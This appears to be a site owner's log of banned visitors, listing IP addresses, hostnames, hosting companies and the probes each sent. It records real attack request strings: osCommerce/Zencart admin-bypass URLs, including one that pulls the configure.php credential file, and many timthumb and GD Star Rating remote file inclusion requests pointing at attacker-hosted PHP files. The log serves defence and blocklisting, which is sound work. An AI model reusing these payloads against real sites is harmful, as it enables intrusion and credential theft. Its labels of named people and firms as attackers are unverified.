Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)
193.86.137.52 Company: Czech Republic Prague Gts Czech S.r.o.
37.34.55.207 Hostname: sv01.leisure-it.nl
Company: Netherlands – Amsterdam Xl Internet Services B.v.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
108.163.161.74 Hostname: night2live.com
Company: Mexico – Monterrey David Varela
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
184.82.10.101 Hostname: 184-82-10-101.static.hostnoc.net
Company: United States – Network Operations Center Inc.
Comment Spammer
173.245.220.175 Company: United States San Jose Egihosting Comment Spammer
157.86.172.250 Company: Brazil Rio De Janeiro Fundacao Oswaldo Cruz Timthumb RFI script attack:
/wp-content/themes/TheStyle/timthumb.php?src=http: //picasa.com.ganesavaloczi.hu/jos.php
65.55.213.66 Hostname: msnbot-65-55-213-66.search.msn.com
Company: United States – Bristow Microsoft Corp
msnbot/2.0b (+http: //search.msn.com/msnbot.htm)
Rule breaker – ignored robots.txt
Found Honeypot trap file
190.206.252.124 Hostname: 190-206-252-124.dyn.dsl.cantv.net
Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
Trackback Spammer
195.191.252.60 Hostname: roadrunner.mysys.at
Company: Austria – Semriach Martin Jantscher Trading As Mysys Telekom
Known mail server and dictionary attacker
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
174.36.153.149 Hostname: sea-stream01.broadcastmatrix.com
Company: United States – Baton Rouge Hosting Services Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
142.4.127.29 Company: United States – San Jose Xs (PEGTECHINC – PEG TECH INC) Bad Host: San Jose Xs
Comment Spammer
184.107.48.219 Hostname: server1.basehost.com.br
Company: Canada – Montreal Iweb Dedicated Cl
Looking for wpOnlineStore/osCommerce/ZenCart vulnerability:
[URL]/&sa=U&ei=5lFPUbbbG8KUiQKm1oCgDg&ved=0CIoCEBYwSg&usg=
AFQjCNHyZp2pDRxETc0MlnY8Su3riaXqmg/admin/categories.php/login.php
/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
37.113.50.49 Hostname: 37x113x50x49.dynamic.penza.ertelecom.ru
Company: Russian Federation – Penza Cjsc Er-telecom Holding
Comment Spammer
67.202.49.215 Hostname: ec2-67-202-49-215.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Looking for non-existent URLs
/bundles/framework/css/exception.css
/sf/sf_default/css/screen.css
64.120.167.34 Hostname: 64-120-167-34.static.hostnoc.net
Company: United States – Network Operations Center Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
130.207.122.165 Hostname: manganese.cc.gatech.edu
Company: United States – Atlanta Georgia Institute Of Technology
Banned for trying to access script functions
(function()%7Bwindow.twttr=window.twttr||%7B%7D;var%20D=550,A=450,C=
screen.height,B=screen.width,H=Math.round((B/2)-(D/2)),G=0,F=document,E;if
(C%3EA)%7BG=Math.round((C/2)-(A/2))%7Dwindow.twttr.shareWin=window.ope
n(‘http:/twitter.com/share’,”,’left=’+H+’,top=’+G+’,width=’+D+’,height=’+A+’,personalbar=
0,toolbar=0,scrollbars=1,resizable=1′);E=F.createElement(‘script’);E.src=
‘http:/platform.twitter.com/bookmarklets/share.js?v=1’;F.getElementsByTagName
(‘head’)%5B0%5D.appendChild(E)%7D());
204.124.180.55 Company: United States – Scranton Volumedrive
Website hosting server for ia-asc.net
Trying to register on site.
199.102.76.250 Hostname: pzok.x.rootbsd.net
Company: United States – Raleigh Tranquil Hosting Inc.
Trying to access admin server scripts
/phpmyadmin/index.php
/pma/index.php
/myadmin/index.php
173.192.235.226 Hostname: 173.192.235.226-static.reverse.softlayer.com
Company: United States – Knoxville Softlayer Technologies Inc.
Banned Bot:
Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http: //siteexplorer.info/)
Looking for content creation weaknesses
208.71.11.178 Hostname: 208-71-11-178.zerofail.com
Company: Canada – Verdun Zerofail
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
64.15.155.121 Hostname: server3.cnbb.org.br
Company: Canada – Montreal Iweb Dedicated Cl
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
194.116.187.25 Hostname: turbolrrr.planet-school.de
Company: Germany – Frankfurt Am Main Planet School Webhosting E.k.
Shared hosting server – 1175 websites
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
91.200.40.82 Hostname: h82.hvosting.ua
Company: Ukraine – Kiev Pe Konstantin Vladimirovich Kravchenko
Shared hosting server
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
BANNED REGION: UKRAINE
66.172.56.8 Hostname: web049.lax1.coolhandle.com
Company: United States – Los Angeles Cool Handle Hosting
Shared hosting server
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
137.117.68.98 Company: United States – Redmond Microsoft Corp Comment Spammer
187.149.241.160 Hostname: dsl-187-149-241-160-dyn.prod-infinitum.com.mx
Company: Mexico – Mexico City Uninet S.a. De C.v.
Banned for Hotlinking
76.179.144.239 Hostname: cpe-76-179-144-239.maine.res.rr.com
Company: United States – Ellsworth Road Runner Holdco Llc
Website Hosting: tralce.com (This is a bad website – it may have been created for hacking purposes!)
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
36.251.43.51 Company: China – Fuzhou Fuzhou City Fujian Provincial Network Of Unicom Trying to create user account and post content:
/CreateUser.asp
/logging.php?action=login
/login.php?part=register
/member.php/register.php?type=company
/member.php?action=login&mod=logging
/member/index_do.php?dopost=regnew&fmdo=user
/post.php
/reg.asp
/register.aspx
142.4.101.12 Company: United States – San Jose Sosoym.com Comment Spammer
41.193.5.52 Hostname: lan-linux-01.hc8.voxcore.co.za
Company: South Africa – Johannesburg Jhb Hosting Zone Customer Vlans
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
Looking for banned URL: */is-human/
137.116.193.224 Company: United States – Redmond Microsoft Corp Banned for repeated attempts to register on site.
190.85.37.90 Company: Colombia – Bogota Telmex Colombia S.a Comment Spammer
173.237.189.182 Hostname: rock.serverdnspoint.com
Company: United States – Dallas Colo4 Llc
Website hosting server: tu-adelanto.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
69.175.26.90 Hostname: web2.beastnode.net
Company: United States Chicago Singlehop Inc.
Shared hosting server.
Trying to access site admin:
administrators.php/login.php
195.199.230.101 Hostname: server.brody-ajka.sulinet.hu
Company: Hungary – Ajka Brody Imre Gimnazium Es Szakkozepiskola
Hacker activity:
/admin/modules.php/login.php
190.111.122.2 Company: Venezuela, Bolivarian Republic Of Valencia Ewinet C.a. Comment Spammer
108.178.60.198 Hostname: 12.dofollow8.servinio.com
Company: United States – Chicago Singlehop Inc. (Again)
Comment Spammer
173.237.182.72 Hostname: 173.237.182.72.tailormadeservers.com
Company: United States – Dallas Dfw Datacenter
Looking for zipped files with .7z .rar .zip extension
139.192.70.57 Company: Indonesia – Jakarta Pt. First Media Tbk Multiple violations:
Suspicious activity:
%3Cdiv%20id=%22fb-root%22%3E%3C/div%3E%20%3Cscript%3E(function
(d,%20s,%20id)%20{%20%20%20var%20js,%20fjs%20=%20d.getElementsByTagName
(s)[0];%20%20%20if%20(d.getElementById(id))%20return;%20%20%20js%20=%20d.
createElement(s);%20js.id%20=%20id;%20%20%20js.src%20=%20%22//
connect.facebook.net/en_GB/all.js
Trying to read CAPTCHA code without accessing post:
/?ctf_show_captcha=1&ctf_sm_captcha=1&ctf_form_num=2
108.166.79.24 Website moviora.com on GoDaddy Shared Hosting Server Banned for hotlinking to images
37.112.73.147 Hostname: dynamicip-37-112-73-147.pppoe.nn.ertelecom.ru
Company: Russian Federation – Nizhniy Novgorod Cjsc Er-telecom Holding
Comment Spammer
184.154.170.50 Hostname: node01.4wd4.com
Company: United States – Chicago Singlehop Inc.
WordPress timthumb RFI attempt
/wp-content/themes/striking/includes/timthumb.php?src=http %3A%2F%2Fimg.youtube .com.portalimobiliariodesergipe.com.br%2Fcache.php
37.113.36.116 Hostname: dynamicip-37-112-73-147.pppoe.nn.ertelecom.ru
Company: Russian Federation – Penza Cjsc Er-telecom Holding
Comment Spammer
36.249.142.136 Company: China – Xiamen Xiamen City Fujian Provincial Network Of Unicom Brute force attempt to register/login to site
Attempt to access non-existent CGI scripts
173.193.205.248 Hostname: 173.193.205.248-static.reverse.softlayer.com
Company: United States – Sacramento Softlayer Technologies Inc.
Rule Breaker: Looking for non-existent URLs
Banned User Agent:
Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http: //siteexplorer.info/)
SiteExplorer/1.0 http //siteexplorer.info/
SiteExplorer/1.0 http ://siteexplorer.info/
142.4.99.164 Company: United States – San Jose Jinsu Technology Limited Liability Company Comment Spammer
199.19.105.94 Company: United States – Scranton Volumedrive Comment Spammer
201.216.232.48 Hostname: pluton.xmundo.net
Company: Argentina – Buenos Aires Nss S.a.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.17.133.22 Hostname: 173-17-133-22.client.mchsi.com
Company: United States – Jackson Mediacom Communications Corp
Looking for CGI vulnerability:
/cgi-bin/cgiemail/cgi-bin//mailmoct.txt
108.163.221.82 Hostname: 30.dofollow4.servinio.com
Company: United States – Chicago Singlehop Inc.
Bot attempting to login/register
Mail Server
192.74.224.252 Company: United States – San Jose Peg Tech Inc Comment Spammer
216.224.174.67 Hostname: vps-1120333-14095.manage.myhosting.com
Company: United States – Truckee Softcom America Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
184.105.211.2 Hostname: kilo.he.net
Company: United States – Fremont Hurricane Electric Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/2/&sa=U&ei=aB04UZrGAcKxO9_jgfgK&ved=0CGYQFjAZOKwC&usg=
AFQjCNG5VZENUe8_EGlytk4y9WzjhJGYtg/admin/banner_manager.php/login.php
/2/&sa=U&ei=Vh04UaHYPMWHqQHBr4GwAg&ved=0CHIQFjAcOMgB&usg=
AFQjCNGNVUF9OqDjrHzWAnE91qWgmJ0x_A/admin/file_manager.php/login.php
Trying to access non-existing path /zboard.php?id=byroe
192.74.239.115 Company: United States – San Jose Qingfeng Simple DoS attack resulting in hundreds of hits to a single URL
[article-url]/index.php
63.170.254.21 Company: United States – Covington Scp Pool Corporation Hacker
/phpMyAdmin/scripts/setup.php
FAKE USER AGENT: Mozilla/5.0 (compatible; bingbot/2.0; +http: //www.bing.com/bingbot.htm)
108.74.189.16 Hostname: 108-74-189-16.lightspeed.tukrga.sbcglobal.net
Company: United States – Tucker AT&T Internet Services
Comment Spammer
50.30.32.91 Hostname: usloft2553.serverloft.com
Company: United States – Saint Louis Hosting Solutions International Inc.
Comment Spammer
192.119.148.235 Company: United States – Dallas Gretchen Holmes Comment Spammer
173.232.104.30 Company: United States – Newhall Blue Deals Fly Comment Spammer
173.232.88.99 Hostname: mx99.derrenger.com
Company: United States – Kittery 5280 Enterprises Llc
Comment Spammer
142.54.190.204 Company: United States – Kansas City Datashack Lc Comment Spammer
199.116.85.253 Hostname: 199-116-85-253.5280enterprises.com
Company: United States Kittery 5280 Enterprises Llc
Comment Spammer
72.55.165.147 Company: Canada – Montreal Iweb Dedicated Cl
(Shared Hosting Server)
RFI attempt
/wp-content/plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php?src=http:
//flickr.com.alba-sport.net/bad.php
65.61.39.39 Hostname: vps-1004249-420.site.infoquest.com
Company: United States – Harrisburg Infoquest Technologies Inc.
(Shared Hosting Server)
WordPress timthumb RFI exploit attempt
/wp-content/plugins/thethe-image-slider/timthumb.php?src=http
%3A%2F%2Fupload.wikimedia.org.twymsln.com/stunz.php
Blocked by Firewall – BANNED
141.105.87.76 Company: Lebanon – Beirut Transmog Inc S.a.l Comment Spammer
Found Honeypot trap
177.70.5.94 Hostname: th1021530.cloudth.com.br
Company: Brazil – Sao Paulo Desenvolve Solucoes De Internet Ltda
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
//wp-content/gd-star-rating/?src=http %3A%2F%2Fpicasa.com.m-2p.com/suntik.php
198.143.186.81 Hostname: vpsnode5.hostthename.com
Company: United States – Chicago Singlehop Inc.
Shared Hosting server
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
//wp-content/gd-star-rating/?src=http %3A%2F%2Fpicasa.com.m-2p.com/suntik.php
176.9.40.226 Hostname: static.226.40.9.176.clients.your-server.de
Company: Germany – Nuremberg Hetzner Online Ag
Shared Hosting server
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
//wp-content/gd-star-rating/?src=http %3A%2F%2Fpicasa.com.m-2p.com/suntik.php
88.191.94.202 Hostname: srv1.felten.biz
Company: France – Paris Free Sas
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
/wp-content/gd-star-rating/timthumb.php?src=http %3A%2F%2Fblogger.com.lendyourhome.org%2Fcok.php
37.59.32.19 Hostname: srv1.felten.biz
Company: France – Roubaix Ovh Systems
Shared Hosting server
Brute force Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
/wp-content/gd-star-rating/timthumb.php?src=http %3A%2F%2Fblogger.com.lendyourhome.org%2Fcok.php
74.117.220.26 Hostname: ns26.dnchosting.com
Company: Cayman Islands – George Town Directnic Ltd.
Brute force Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
/wp-content/gd-star-rating/timthumb.php?src=http %3A%2F%2Fblogger.com.lendyourhome.org%2Fcok.php
88.191.94.202 Hostname: mb2d151.vdrs.net
Company: Viet Nam – Thanh Pho Ho Chi Minh Cong Ty Co Phan Dich Vu Du Lieu Truc Tuyen
Brute force Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
/wp-content/gd-star-rating/timthumb.php?src=http %3A%2F%2Fblogger.com.lendyourhome.org%2Fcok.php
50.117.61.100 Company: United States – San Jose Detectnetwork.us JavaScript Injection attack blocked by firewall
Trying to include content linking to kamagra websites
199.241.191.131 Company: United Kingdom – Charlwood Kamran Moussa-zadeh Attempting WordPress timthumb RFI exploit:
/wp-content/themes/Widescreen/includes/timthumb.php?src=http: //flickr.com.alba-sport.net/bad.php
50.22.199.170 Hostname: 50.22.199.170-static.reverse.softlayer.com
Company: United States – Dallas Softlayer Technologies Inc.
User Agent: SiteExplorer/1.0 http ://siteexplorer.info/
Highly suspicious activity
/-ir)hvcFaenuiicli3bner2-an.co.1h-obme)St5hapter-2-ae.caenem%20r3aenu-itemem%20r3aenu-itememp
/%3Che0ud
/-ir)hvcFaenuiicli3bner2-an.co.1h-obme)St5hapter-2-aenu-
And similar non-existent URLs
BANNED USER AGENT SiteExplorer/1.0
173.233.69.208 Hostname: 173-233-69-208.STATIC.turnkeyinternet.net
United States – Latham Turnkey Internet Inc.
Probing for vulnerabilities
Mail server / shared website hosting server
195.190.28.97 Hostname: cluster1.greenhost.nl
Company: Netherlands – Amsterdam Mart Jaco Van Santen Trading As Greenhost Vof
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
37.1.222.20 Company: Germany – Berlin 3nt Solutions Llp
Web server – 1 website: australia-impotence.com
Trying to login/register
65.55.24.239
65.55.213.193
Hostname: msnbot-65-55-24-239.search.msn.com
Company: United States Redmond Microsoft Corp
Rule breaker.
MSN bot has started looking for script functions e.g.
/function.require
After several months of watching MSN/bing bots crawling disallowed files and folders,
I am now blocking their bots completely
This behaviour by Microsoft web bots is totally unacceptable – their bots totally ignore robots.txt
159.253.21.202 Hostname: delilinux.org
Company: Estonia – Johvi Fastvps Eesti Ou
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
65.55.213.193 Hostname: msnbot-65-55-213-193.search.msn.com
Company: United States – Bristow Microsoft Corp
Rule Breaker:
BANNED BOT: MSN Bot / search.msn.com
195.189.140.141 Hostname: 141.hosting-5.xtream.co.il
Company: Israel – Tel Aviv Q-host Internet Services – Hosting
DoS attack blocked by firewall
Attempted wpOnlineStore/osCommerce/Zencart exploit:
//reviews/wponlinestore-review//admin/categories.php/login.php
//reviews/wponlinestore-review//admin/categories.php/login.php?cPath=&action=new_product_preview
//reviews/images/m32.php
151.237.190.156 Company: Sweden – Stockholm Deepak Mehta Fie Comment Spammer
190.0.19.146 Hostname: mail.cmplogistica.com
Company: Colombia – Medellin Epm Telecomunicaciones S.a. E.s.p.
Comment Spammer
190.38.71.223 Hostname: 190-38-71-223.dyn.dsl.cantv.net
Company: Venezuela – Bolivarian Republic Of Caracas Cantv Servicios Venezuela
Comment Spammer
219.166.139.187 Hostname: himej-ys.jp
Company: Japan – Tokyo Co. Centralsuccess
WordPress timthumb RFI attempt.
/wp-content/plugins/shortcodes-ultimate/lib/timthumb.php?src=http
%3A%2F%2Fpicasa.com.debateandreview.com/tim/up.php
87.106.207.9 Hostname: s15346772.onlinehome-server.info
Company: Spain 1&1 Internet Ag
WordPress timthumb RFI attempt.
/wp-content/themes/bueno/timthumb.php?src=http
%3A%2F%2Fpicasa.com.debateandreview.com/tim/up.php
66.209.51.70 Hostname: mail.osmh.on.ca
Company: Canada – Orillia Orillia Soldiers Memorial Hospital
User Agent: CCBot/1.0 (+http: //www.commoncrawl.org/bot.html)
Hacker looking for server scripts:
/sql/scripts/setup.php
/phpmyadmin2/scripts/setup.php
/pma/scripts/setup.php
/phpMyAdmin/scripts/setup.php
195.211.149.66 Hostname: public-66.WATSON.ZP.UA
Company: Ukraine – Zaporizhzhya Pe Vaschuk Alexander Sergeevich
Hacker activity
/engine/engine.php
fpw.php
configuration.php
wp-admin.php
184.172.128.123 Hostname: pre.prendo.net
Company: United States – Salt Lake City Theplanet.com Internet Services Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
184.154.176.98 Hostname: ch1-cid11030037-201104051156.spheryx.net
Company: United States – Chicago Singlehop Inc.
Shared Hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
204.93.60.17 Company: United States – Torrance Giglinx Inc. JavaScript injection attempt blocked by firewall
184.82.92.86 Hostname: service.productservicestuv.com
Company: United States – Chandler Dme Hosting Llc
Brute Force login attempt
/wp-login.php
78.85.13.117 Hostname: a117.sub13.net78.udm.net
Company: Russian Federation – Izhevsk First Assignment
RFI attack detected
//wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php
14.98.167.150 Hostname: Static-150.167.98.14.tataidc.co.in
Company: India – Delhi Tata Teleservices Ltd – Tata Indicom – Cdma Division
Comment Spammer
Mail Server
192.119.148.43 Company: United States – Dallas Louis Joseph Comment Spammer
37.75.10.122 Hostname: 37-75-10-122.rdns.saglayici.net
Company: Turkey – Istanbul Saglayici Teknoloji Bilisim Yayincilik Hiz. Ticaret Ltd. Sti.
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
/gd-star-ratings-vulnerability//wp-content/gd-star-rating/?src=http: //flickr.com.alba-sport.net/bad.php
142.91.180.35 Hostname: 142.91.180.35.rdns.ubiquity.io
Company: United States – Dallas Ubiquity Server Solutions Dallas
Comment Spammer
69.16.211.147 Hostname: titan.sitebuilder-hosting.como
Company: United States – New York City Liquid Web Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
205.164.32.102 Company: United States San Jose Detectnetwork.us JavaScript injection attack detected:
Trying to redirect to Kamagra related websites
37.59.205.106 Company: France – Roubaix Ovh Systems Bot attempting to login/register
37.59.150.112 Company: France – Roubaix Ovh Systems Bot attempting to login/register
184.154.57.93 Hostname: vm18.dofollow2.servinio.com
Company: United States – Chicago Singlehop Inc.
Bot attempting to login/register
184.154.221.147 Hostname: 46.dofollow5.servinio.com
Company: United States – Chicago Singlehop Inc.
Comment Spammer
199.204.45.171 Hostname: node-1jfq017.cloud9.ymq1.ca.layeredge.net
Company: Canada – Montreal Vexxhost
Comment Spammer
184.154.205.189 Hostname: 6.dofollow7.servinio.com
Company: United States – Chicago Singlehop Inc.
Tried to Register/login
63.141.199.118 Company: United States – Torrance Giglinx Inc. Comment Spammer
JavaScript Injection attack blocked by firewall
77.92.72.99 Hostname: listmail.permissionedemails.co.uk
Company: United Kingdom – London Uk2 – Ltd
Attempting WordPress timthumb RFI exploit:
/wp-content/plugins/shortcodes-ultimate/lib/timthumb.php?src=http
%3A%2F%2Fpicasa.com.chevyregina.com/bajo.php
188.132.210.119 Hostname: static-119-210-132-188.sadecehosting.net
Company: Turkey – Istanbul Hosting Internet Hizmetleri Ltd Sti
Attempting WordPress timthumb RFI exploit:
/wp-content/themes/listings/thumb.php?src=http
%3A%2F%2Fblogger.com.thephysicscorner.com%2Fbad.php
211.39.253.100 Hostname: t1.dothost.co.kr
Company: Korea, Republic Of – Seoul Scmjbc
Trying WordPress GD Star Rating plugin RFI exploit
/wp-content/gd-star-rating/?src=http: //picasa.com.compraonlinecr.com/index.php
46.105.2.157 Hostname: vps10879.ovh.net
Company: France – Roubaix Ovh Systems
Trying WordPress GD Star Rating plugin RFI exploit
/wp-content/gd-star-rating/?src=http: //picasa.com.compraonlinecr.com/index.php
108.167.186.180 Hostname: vps.solin.adv.br
Company: United States – Houston Websitewelcome.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
164.151.194.21 Hostname: 164.151.194.21.static.because.DUL.is.RFC.ignorant.gov.za
Company: South Africa – Cape Town Government Of South Africa
Looking for non-existent paths in system folders.
BANNED
198.143.162.27 Hostname: df22.dofollow.biz
Company: United States Chicago Singlehop Inc.
Malicious User Agent: PHP/5.2.10
37.113.12.51 Company: Russian Federation – Penza Cjsc Er-telecom Holding Comment Spammer
78.46.64.45 Hostname: static.45.64.46.78.clients.your-server.de
Company: Germany Nuremberg Hetzner Online Ag
Attempting WordPress timthumb RFI exploit:
/wp-content/themes/Mystique/cache/timthumb.php?src= http:
//wordpress.com.projetoulisses.com/byroe.php
Stopped by server security – Banned
199.19.109.220 Hostname: The.Easiest.The.Best.VPSInfinity.com
Company: United States – Scranton Volumedrive
Comment Spammer
Found honeypot trap files
69.50.196.80 Hostname: evoxmanagement.com
Company: United States – Phoenix Atjeu Publishing Llc
Attempting WordPress timthumb RFI exploit:
/wp-content/themes/twentyeleven/scripts/timthumb.php?src=http
%3A%2F%2Fflickr.com.alba-sport.net%2Fbad.php
/nomnom-theme/wp-content/themes/twentyeleven/scripts/timthumb.php?src=http
%3A%2F%2Fflickr.com.alba-sport.net%2Fbad.php
/nomnom-theme/&sa=U&ei=fW4NUbqDN8agiAL_1YGwBw&ved=0CH4QFjAi&usg=
AFQjCNE9sIh1pBfJxCt4ZlPlqVKgMNgKaQ/wp-content/themes/twentyeleven/scri
164.177.151.5 Hostname: 164-177-151-5.static.cloud-ips.co.uk
Company: United Kingdom – Uxbridge Rackspace.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
50.117.61.20 Hostname: 208-115-111-73-reverse.wowrack.com
Company: United States – San Jose Detectnetwork.us
Comment Spammer
JavaScript injection attempt
37.144.91.83 Hostname: 37-144-91-83.broadband.corbina.ru
Company: Russian Federation – Moscow Dynamic Ip Pool For Broadband Customers
Attempting to login to site admin
100.43.83.135 Hostname: spider-100-43-83-135.yandex.com
Company: United States – Palo Alto Yandex Inc
YANDEX bot
142.91.79.26 Hostname: 142.91.79.26.rdns.ubiquity.io
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Comment Spammer
68.234.17.175 Hostname: reverse.aeori.com Comment Spammer
24.115.243.119 Hostname: 24.115.243.119.res-cmts.sm.ptd.net
Company: United States – Macungie Penteledata Inc
Comment Spammer
37.59.74.238 Company: France – Roubaix Ovh Systems Attempting to register/login
108.178.25.198 Hostname: 18.dofollow4.servinio.com
Company: United States – Chicago Singlehop Inc.
Comment Spammer
199.180.119.201 Company: United States – Scranton Volumedrive Comment Spammer
173.208.2.109 Hostname: 173.208.2.109.rdns.ubiquityservers.com
Company: United States – Chicago Ubiquity Server Solutions Chicago
Comment Spammer
173.234.196.209 Company: United States – Chicago Ubiquity Server Solutions Chicago Comment Spammer
174.34.212.141 Hostname: 141.212-34-174.ftth.swbr.surewest.net
Company: United States – Sacramento Surewest Broadband
Comment Spammer
173.245.64.2 Company: United States – Montebello Detectnetwork.us Comment Spammer
JavaScript malware in comment
209.188.3.172 Hostname: s01.sideservers.com
Company: United States – Phoenix Secured Servers Llc
Trying WordPress GD Star Rating plugin & timthumb RFI exploit
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.alba-sport.net/bad.php
71.6.203.27 Hostname: asterix.havendata.net
Company: United States – San Diego Carinet Inc.
Trying WordPress timthumb RFI exploit
/wp-content/plugins/logo-management/includes/timthumb.php?src=http:
//picasa.com.kidsworldprintables.com/result/bat.php
82.33.211.221 Hostname: web01.serversname.com
Company: United Kingdom – Woking Continental.
Trying WordPress timthumb RFI exploit
/wp-content/plugins/jetpack/timthumb.php?src=http %3A%2F%2Fflickr.com.guille.net%2Fbad.php
199.59.56.24 Hostname: frog.novo-flash.com
Company: United States – Tulsa Hostwinds Llc.
Attempting to register/login
216.157.31.148 Company: United States – Southgate Peer 1 Dedicated Hosting Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.144.116.181 Company: United States – Torrance Giglinx Inc. Comment Spammer.
Basic Javascript Injection attempted
91.121.27.38 Hostname: ns25033.ovh.net
Company: France – Roubaix Ovh Systems
Attempting WordPress timthumb RFI exploit
/wp-content/themes/delicious/scripts/timthumb.php?src=http:
//flickr.community.felipealliende.cl/wp-login.php
Mail Server
Banned Host: Roubaix Ovh Systems
188.165.251.128 Hostname: ks215201.kimsufi.com
Company: France – Roubaix Ovh Systems
Attempting WordPress timthumb RFI exploit
/wp-content/themes/delicious/scripts/timthumb.php?src=http: //img.youtube.com.parsau.cl/youtube.php
Banned Host: Roubaix Ovh Systems
70.174.185.71 Hostname: ip70-174-185-71.dc.dc.cox.net
Company: United States – Alexandria Cox Communications
Regularly seen lookup for stylesheets and Star rating files without loading any pages.
May be trying to use site as CDN
67.214.185.154 Company: United States – Santa Monica Colostore.com Trying WordPress timthumb RFI exploit
wp-content/themes/TheStyle/timthumb.php?src=http %3A%2F%2Fpicasa.com.lawebshop.ca%2Fjahat.php
77.222.40.65 Hostname: vh22.sweb.ru
Company: Russian Federation – Moscow Garant-park-telecom Ltd.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
37.59.82.65 Company: France – Roubaix Ovh Systems Trying to login/register
110.85.113.69 Host: China – Fuzhou Chinanet Fujian Province Network Brute force login/register attempt
/profile.php?mode=register&agreed=true&coppa=0
/index.php?act=Login&CODE=00
/ucp.php?mode=register
/registration_rules.asp?FID=0
/index.php?do=/user/register/
/index.php?page=en_Signup
/tools/quicklogin.one
